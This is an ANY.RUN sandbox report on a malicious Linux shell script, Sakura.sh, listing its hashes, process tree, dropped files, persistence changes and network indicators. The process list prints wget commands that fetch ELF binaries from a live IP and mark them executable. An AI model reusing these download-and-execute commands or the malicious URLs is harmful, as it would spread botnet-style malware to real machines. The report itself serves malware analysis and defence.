download:

/Sakura.sh

Full analysis: https://app.any.run/tasks/f5714cff-6e44-408b-a93e-c8283de13812
Verdict: Malicious activity
Analysis date: May 17, 2025, 20:19:09
OS: Ubuntu 22.04.2
MIME: text/x-shellscript
File info: Bourne-Again shell script, ASCII text executable
MD5:

820B9853E0E3B8153D6D14336763823A

SHA1:

3E722766792A577582141C87737CAC1F2D9E8E99

SHA256:

7E80330CA02BEAED0FDDD74EAC8195889CCB309521D7D583CC1EB1D7F7A8C1C4

SSDEEP:

48:vvd8jSttQdM5YiRW7zT6XCZIQL1y5NZIgxJT:vvd8jSttQdM5YiRW7zT6XCZIQBy5NZIM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • x-8.6-.Sakura (PID: 41055)
      • x-8.6-.Sakura (PID: 41054)

  • SUSPICIOUS

    • Executes commands using command-line interpreter

      • bash (PID: 41035)
      • sudo (PID: 41034)

    • Modifies file or directory owner

      • sudo (PID: 41031)

    • Uses wget to download content

      • bash (PID: 41035)

    • Executes the "rm" command to delete files or directories

      • bash (PID: 41035)

    • Gets active network interfaces

      • bash (PID: 41035)

    • Reads network configuration

      • bash (PID: 41035)

    • Modifies bash configuration script

      • dash (PID: 41058)

    • Gets information about currently running processes

      • dash (PID: 41065)
      • dash (PID: 41069)
      • dash (PID: 41073)
      • dash (PID: 41077)

    • Potential Corporate Privacy Violation

      • wget (PID: 41052)
      • wget (PID: 41037)
      • wget (PID: 41047)
      • wget (PID: 41042)

    • Gets active TCP connections

      • bash (PID: 41035)

    • Connects to unusual port

      • x-8.6-.Sakura (PID: 41054)

  • INFO

    • Checks timezone

      • wget (PID: 41042)
      • wget (PID: 41037)
      • wget (PID: 41047)
      • wget (PID: 41052)

    • Creates file in the temporary folder

      • wget (PID: 41037)
      • wget (PID: 41042)
      • wget (PID: 41047)
      • wget (PID: 41052)
      • dash (PID: 41061)
      • sysctl (PID: 41062)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.sh | Linux/UNIX shell script (100)
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
183
Monitored processes
52
Malicious processes
1
Suspicious processes
2

Behavior graph

Click at the process to see the details
dash no specs sudo no specs chown no specs chmod no specs sudo no specs bash no specs locale-check no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs bash no specs rm no specs wget chmod no specs x-8.6-.sakura x-8.6-.sakura no specs dash no specs dash no specs dash no specs dash no specs mount no specs dash no specs sysctl no specs dash no specs dash no specs sysctl no specs pgrep no specs dash no specs killall no specs dash no specs pgrep no specs dash no specs killall no specs dash no specs pgrep no specs dash no specs killall no specs dash no specs pgrep no specs dash no specs killall no specs dash no specs busybox no specs dash no specs busybox no specs

Process information

PID
CMD
Path
Indicators
Parent process
41030/bin/sh -c "sudo chown user /tmp/Sakura\.sh && chmod +x /tmp/Sakura\.sh && DISPLAY=:0 sudo -iu user /tmp/Sakura\.sh "/usr/bin/dashIntiFjKCklFyPMJr
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41031sudo chown user /tmp/Sakura.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41032chown user /tmp/Sakura.sh/usr/bin/chownsudo
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41033chmod +x /tmp/Sakura.sh/usr/bin/chmoddash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41034sudo -iu user /tmp/Sakura.sh/usr/bin/sudodash
User:
root
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libaudit.so.1.0.0
/usr/lib/x86_64-linux-gnu/libselinux.so.1
/usr/libexec/sudo/libsudo_util.so.0.0.0
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libcap-ng.so.0.0.0
/usr/lib/x86_64-linux-gnu/libnss_systemd.so.2
/usr/libexec/sudo/sudoers.so
/usr/lib/x86_64-linux-gnu/libpam.so.0.85.1
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
41035/bin/bash /tmp/Sakura.sh/usr/bin/bashsudo
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libtinfo.so.6.3
/usr/lib/x86_64-linux-gnu/libc.so.6
41036/usr/bin/locale-check C.UTF-8/usr/bin/locale-checkbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41037wget http://146.103.53.37/m-i.p-s.Sakura/usr/bin/wget
bash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libpcre2-8.so.0.10.4
/usr/lib/x86_64-linux-gnu/libuuid.so.1.3.0
/usr/lib/x86_64-linux-gnu/libidn2.so.0.3.7
/usr/lib/x86_64-linux-gnu/libssl.so.3
/usr/lib/x86_64-linux-gnu/libcrypto.so.3
/usr/lib/x86_64-linux-gnu/libz.so.1.2.11
/usr/lib/x86_64-linux-gnu/libpsl.so.5.3.2
/usr/lib/x86_64-linux-gnu/libc.so.6
/usr/lib/x86_64-linux-gnu/libunistring.so.2.2.0
41038chmod +x m-i.p-s.Sakura/usr/bin/chmodbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
0
Modules
Images
/usr/lib/x86_64-linux-gnu/libc.so.6
41039/bin/bash /tmp/Sakura.sh/usr/bin/bashbash
User:
user
Integrity Level:
UNKNOWN
Exit code:
32256
Executable files
0
Suspicious files
4
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
41037wget/tmp/m-i.p-s.Sakura (deleted)binary
MD5:
SHA256:
41042wget/tmp/m-p.s-l.Sakurabinary
MD5:
SHA256:
41047wget/tmp/s-h.4-.Sakura (deleted)binary
MD5:
SHA256:
41052wget/tmp/x-8.6-.Sakurabinary
MD5:
SHA256:
41054x-8.6-.Sakura/home/user/.config/autostart/.xdg.conftext
MD5:
SHA256:
41058dash/home/user/.bashrctext
MD5:
SHA256:
41061dash/tmp/.sysctl_max (deleted)text
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
13
DNS requests
12
Threats
4

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
204
185.125.190.17:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
GET
204
185.125.190.17:80
http://connectivity-check.ubuntu.com/
unknown
whitelisted
41037
wget
GET
200
146.103.53.37:80
http://146.103.53.37/m-i.p-s.Sakura
unknown
unknown
41042
wget
GET
200
146.103.53.37:80
http://146.103.53.37/m-p.s-l.Sakura
unknown
unknown
41047
wget
GET
200
146.103.53.37:80
http://146.103.53.37/s-h.4-.Sakura
unknown
unknown
41052
wget
GET
200
146.103.53.37:80
http://146.103.53.37/x-8.6-.Sakura
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
484
avahi-daemon
224.0.0.251:5353
unknown
185.125.190.17:80
connectivity-check.ubuntu.com
Canonical Group Limited
GB
whitelisted
195.181.170.19:443
odrs.gnome.org
Datacamp Limited
DE
whitelisted
185.125.188.58:443
api.snapcraft.io
Canonical Group Limited
GB
whitelisted
41037
wget
146.103.53.37:80
BE
unknown
41042
wget
146.103.53.37:80
BE
unknown
41047
wget
146.103.53.37:80
BE
unknown
41052
wget
146.103.53.37:80
BE
unknown
41054
x-8.6-.Sakura
202.181.24.126:9663
Cloudie Limited
HK
unknown

DNS requests

Domain
IP
Reputation
connectivity-check.ubuntu.com
  • 185.125.190.17
  • 185.125.190.98
  • 91.189.91.98
  • 185.125.190.18
  • 91.189.91.48
  • 185.125.190.48
  • 91.189.91.49
  • 185.125.190.96
  • 91.189.91.96
  • 185.125.190.97
  • 185.125.190.49
  • 2001:67c:1562::23
  • 2620:2d:4000:1::97
  • 2620:2d:4000:1::2b
  • 2620:2d:4000:1::98
  • 2620:2d:4000:1::2a
  • 2001:67c:1562::24
  • 2620:2d:4002:1::198
  • 2620:2d:4000:1::96
  • 2620:2d:4000:1::22
  • 2620:2d:4002:1::196
  • 2620:2d:4000:1::23
whitelisted
google.com
  • 142.250.181.238
  • 2a00:1450:4001:82a::200e
whitelisted
odrs.gnome.org
  • 195.181.170.19
  • 169.150.255.184
  • 37.19.194.81
  • 169.150.255.180
  • 212.102.56.179
  • 195.181.175.40
  • 207.211.211.27
  • 2a02:6ea0:c700::18
  • 2a02:6ea0:c700::21
  • 2a02:6ea0:c700::112
  • 2a02:6ea0:c700::19
  • 2a02:6ea0:c700::101
  • 2a02:6ea0:c700::107
  • 2a02:6ea0:c700::11
whitelisted
api.snapcraft.io
  • 185.125.188.58
  • 185.125.188.54
  • 185.125.188.57
  • 185.125.188.59
  • 2620:2d:4000:1010::42
  • 2620:2d:4000:1010::2e6
  • 2620:2d:4000:1010::344
  • 2620:2d:4000:1010::117
whitelisted
10.100.168.192.in-addr.arpa
unknown

Threats

PID
Process
Class
Message
41037
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41042
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41047
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
41052
wget
Potential Corporate Privacy Violation
ET INFO Executable and linking format (ELF) file download Over HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2025 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
/Sakura.sh